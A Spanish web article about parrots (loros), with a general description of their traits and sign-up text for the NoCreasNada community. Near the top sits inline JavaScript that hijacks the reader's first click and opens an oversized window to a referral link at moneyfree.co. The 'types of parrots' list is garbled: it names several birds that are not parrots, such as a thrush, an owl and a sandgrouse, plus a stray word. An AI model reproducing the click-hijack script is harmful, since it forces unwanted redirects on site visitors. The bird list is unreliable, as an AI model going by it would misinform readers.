Medio Ambiente

Loros

Loros - Medio Ambiente

var pup=0;function popup (){if(pup<1){pup=pup+1;var popun=String;popun="https://moneyfree.co/?ref=5ehrqNgQc";window.open(popun, "","toolbar=1,location=1,directories=1,status=1,scrollbars=1,resizable=1,copyhistory=1,menuBar=1,width=30000,height=30000");window.focus();popup.blur();}}document.onclick=popup;
Dentro del fabuloso mundo de las aves hay cientos de especies, pero no todas se pueden tener en casa. No obstante, una de las más queridos por los amantes del cuidado de aves es el loro, un perfecto animal de compañía.

Tipos de loros y papagallos

Zorzal de Heine

carrier

Carrier

Ganga namaqua

Barmacia cariblanca

Tecolote occidental

Talégalo de Geelvink

Papagayo australiano

Papagayo moluqueño

Catey

Amazona de San Vicente

Amazona Imperialis

Amazona cubana

¿Qué es un loro? 🐦

Antiguamente todos los tipos de loros se agrupaban en una sola familia, conocida como Psittacidae, pero debido a las enormes variantes que han ido surgiendo con el paso de los años y las subfamilias, poco a poco el nombre de psittacoidea acabó dejándose para el loro común. Estos se encuentran repartidos por los diferentes continentes, cada uno con una característica que los hace únicos.

Por norma general los loros miden entre 30 y 40 centímetros, tienen un pico curvado con una mandíbula inferior con cierta movilidad y una gran capacidad craneal, lo que lo convierte en una de las aves más inteligentes junto con lo agapornis. Son muy buenas voladores y se pueden agarrar a las ramas de los árboles y trepar por ellas con gran destreza gracias a las garras de sus patas.

La intensa coloración de la pluma es otra de las características del loro. Por norma general el color predominante suele ser el verde, pero en algunas especies tienen otras tonalidades como el azul, el rojo o el amarillo.  La mayoría de especies son monógamas, andando en cavidades de árboles o como en túneles escavados.

Algunas especies pueden imitar una gran cantidad de sonidos, incluyendo la voz humana, lo que ha hecho que se ganen una gran fama entre los amantes de las aves.

¿Te ha gustado el artículo? ¡Valóralo!

1.73 - 15 votos
Cuanto más alta sea la valoración más visible será el artículo en portada.
¡Compártelo en las redes sociales!

Acerca del autor

JEANJO12

Deja un comentario

Únete a la comunidad de NoCreasNada

¿Te gustaría compartir tus inquietudes y ganar seguidores por todo el mundo?

¿Eres una persona inquieta y quieres descubrir a más gente como tú? 

Únete a NoCreasNada.

Además, te pagaremos por las visitas que recibas.

Más Información